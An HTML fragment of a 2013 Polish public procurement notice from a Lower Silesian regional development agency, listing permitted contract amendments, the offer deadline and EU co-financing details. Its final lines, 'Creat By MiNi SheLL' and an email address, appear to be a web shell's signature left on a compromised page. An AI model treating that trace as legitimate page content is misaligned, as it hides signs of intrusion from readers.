<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>a)zmiany w Zakresie zadań Wykonawcy, b)skrócenia terminu realizacji umowy, c)wydłużenia terminu realizacji umowy w następujących przypadku: opóźnień i przerw w realizacji zamówienia wynikających z przyczyn leżących po stronie Zamawiającego oraz opóźnień, utrudnień lub przeszkód spowodowanych różnymi zdarzeniami losowymi w tym siły wyższej, których zaistnienie nie można przypisać Wykonawcy. d)zmiany w zapisach umowy spowodowane koniecznością dostosowania dokumentacji do zmieniających się wymogów PO KL, do interpretacji i wytycznych Instytucji Wdrażającej (IP II stopnia) oraz do obowiązujących przepisów prawa, e)w przypadku gdy nastąpi zmiana powszechnie obowiązujących przepisów prawa w zakresie mającym wpływ na realizację przedmiotu umowy, f)konieczność wprowadzenia zmian będzie następstwem zmian wprowadzonych w umowach pomiędzy zamawiającym a inną niż Wykonawca Stroną, g)nastąpi konieczność zmiany terminów określonych w umowie i jej załącznikach, spowodowana obiektywnymi czynnikami uniemożliwiającymi ich dotrzymanie oraz wynika z okoliczności, których nie można było przewidzieć w chwili zawarcia umowy, h)nastąpi konieczność wprowadzenia zmian sposobu i zakresu realizacji zamówienia w przypadku, gdy konieczność wprowadzenia tej zmiany była spowodowana obiektywnymi czynnikami uniemożliwiającymi realizację umowy zgodnie z pierwotną wersją, i)w przypadku zmiany stawki podatku VAT, wynagrodzenie brutto Wykonawcy pozostanie na dotychczasowym poziomie, zaś zmianie ulegnie jedynie proporcja pomiędzy wartością netto a wartością brutto umowy, j)wykonawca może dokonywać zmiany osób bezpośrednio realizujących zamówienia przedstawionych w ofercie pod warunkiem, że uzyska pisemną zgodę Zamawiającego akceptującego nową osobę. Zamawiający może również zażądać od Wykonawcy zmiany osoby przedstawionej w ofercie Wykonawcy, jeżeli uzna, że osoba nie wykonuje swoich obowiązków wynikających z umowy przy czym w przypadku zmiany tej osoby nowa osoba wskazana na jego miejsce musi posiadać wykształcenie oraz doświadczenie równoważne lub wyższe od wykształcenia i doświadczenia osoby wymienianej. k)Zmiana osób uprawnionych do dokonywania czynności prawnych.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.bip.darr.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Dolnośląska Agencja Rozwoju Regionalnego S.A., ul. Szczawieńska 2, 58-310 Szczawno- Zdrój (sekretariat II piętro)..</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 31.07.2013 godzina 16:00, miejsce: Dolnośląska Agencja Rozwoju Regionalnego S.A., ul. Szczawieńska 2, 58-310 Szczawno- Zdrój (sekretariat II piętro)..</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Zamówienie będzie realizowane w ramach Projektu pn. SPINqbator ZDolnego Śląska współfinansowanego przez Unię Europejską w ramach Europejskiego Funduszu Społecznego..</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com